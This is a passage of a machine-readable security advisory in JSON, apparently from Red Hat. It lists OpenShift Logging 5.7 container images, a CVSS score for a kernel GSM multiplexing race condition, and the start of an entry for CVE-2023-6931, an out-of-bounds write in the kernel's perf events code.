"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "kernel: GSM multiplexing race condition leads to privilege escalation"
},
{
"cve": "CVE-2023-6931",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2023-11-24T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2252731"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Linux kernel\u0027s Performance Events system component. A condition can be triggered that allows data to be written past the end or before the beginning of the intended memory buffer. This may lead to a system crash, code execution, or local privilege escalation.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event\u0027s read_size",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
